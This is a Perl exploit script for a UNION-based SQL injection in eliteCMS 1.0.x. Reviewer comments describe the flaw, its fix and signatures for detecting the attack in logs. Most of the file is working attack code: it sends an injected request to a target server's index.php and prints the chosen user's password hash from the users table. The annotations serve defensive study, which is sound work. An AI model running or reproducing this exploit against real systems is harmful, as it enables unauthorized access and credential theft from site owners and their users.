#!/usr/bin/perl
# NOTE(review): `cls` is the Windows console clear; on any other platform this
# just prints a shell error to stderr and continues.
system('cls');
#************************************************* ****************************
#************************************************* ****************************
#** Written by Dimi4, **
#** Greetings to antichat && elwaux **
#** dork:""Powored by Elite CMS" **
#** version:1.0.x **
#** magic_qotes_gpc=OFF **
#** ** 
#************************************************* ****************************
# ************************************************** **************************
#
# Reviewer summary (defensive context):
#   This script documents a historical UNION-based SQL injection in
#   eliteCMS 1.0.x: the `page` parameter of index.php is concatenated into a
#   SQL statement unquoted/unescaped, so a single quote followed by
#   `UNION SELECT` lets the attacker pull `user_name` and `h_password` from
#   the `users` table into the page's <title>.  The header's note that it
#   requires magic_quotes_gpc=OFF is consistent with that: the payload relies
#   on a literal single quote surviving into the query.
#
#   Mitigation on the application side is the standard one: never build the
#   query by string concatenation with request data; cast `page` to an
#   integer or bind it as a parameter in a prepared statement.
#
#   Detection: every request this script sends carries the literal sequence
#   `index.php?page=1'+union+select` and the fixed hex marker
#   0x336c317433636d353378706c303174 (the ASCII string "3l1t3cm53xpl01t"),
#   so both are cheap, low-false-positive signatures for web-server access
#   logs and WAF rules.  The request also uses bare "\n" line endings rather
#   than the "\r\n" that HTTP requires, which is itself an anomaly worth a
#   log rule.
#
#   Perl-level remarks (no `use strict`/`use warnings`, so none of these are
#   diagnosed at runtime): $dir and $success are assigned but never read;
#   close($sock) is unreachable because both branches above it exit();
#   $1 is printed without checking that the second regex matched.
#
use IO::Socket;
print "\n +-------------------------------------------------------------+\n";
print " | eliteCMS 1.0.x Sql-Injection Exploit |\n";
print " | By Dimi4 |\n";
print " +-------------------------------------------------------------+\n\n";
# Usage banner when fewer than three positional arguments are supplied.
if (@ARGV < 3) {
    print " [i] usage:\r\n";
    print " eliteCMS.pl Server Dir Username\r\n\r\n";
    print " SERVER - Server where eliteCMS was installed.\r\n";
    print " DIR - eliteCMS directory or / for parent.\r\n";
    print " Username - Targer username(default - admin).\r\n";
    print "\n [i] Example:\r\n";
    print " eliteCMS.pl 192.168.168.1 / admin2\n";
    ;
    exit();
}
# Positional arguments; these are package globals, not lexicals.
$serv = $ARGV[0];
$dir = $ARGV[1];      # NOTE(review): assigned but never used below - the URL hard-codes '/'.
$username = $ARGV[2];
# Strip a leading "http://" so $serv can be used as a bare host for the socket.
# The /e flag is a no-op here (the replacement is empty).
$serv =~ s/http:\/\///ge;
# Fixed marker injected into the SELECT so the response can be scraped for it.
# Hex for "3l1t3cm53xpl01t"; a constant and therefore a reliable log/WAF signature.
$delimit = "0x336c317433636d353378706c303174";
# Request path carrying the injection (see reviewer summary above).
$sploit = 'http://'.$serv.'/'.
    'index.php?page=1\'+union+select+1,concat'.
    '(user_name,\''.$delimit.'\',h_password)'.
    ',3,4,5,6,7,8,9,10,11+from+users+where+user_name=\''.$username.'\'+'.
    'limit+1,1%23';
# Plain TCP to port 80; no TLS, no proxy support, no timeout set.
$sock = IO::Socket::INET->new(
    Proto=>"tcp",
    PeerAddr=>"$serv",
    PeerPort=>"80"
) or die " [-] could not connect to host.\n";
print " [+] connecting OK\n";
print " [+] sending exploit..\n";
# Hand-written HTTP/1.1 request with an absolute URI and "\n" line endings.
print $sock "GET $sploit HTTP/1.1\n";
print $sock "Host: $serv\n\n";
# Single read of at most 1000 bytes of the response into $answer.
read($sock,my $answer,1000);
$success = 0;         # NOTE(review): never read again.
print " [+] In progress...\n";
# Presence of the marker in the response is taken as proof the UNION worked.
if ($answer=~ /$delimit/) {
    # Second match is not checked; if it fails, $1 below is stale or undef.
    $answer =~ /$username$delimit(.*)::-::<\/title>/;
    print " [+] Exploit succeeded...\n";
    print ' [+] Targer: '.$serv."\n";
    print ' [+] Username: '.$username."\n";
    print ' [+] Password: '.$1."\n";
    exit();
} else {
    print " [-] FAILED!\n";
    exit();
}
# Unreachable: both branches above call exit().
close($sock);
;
exit();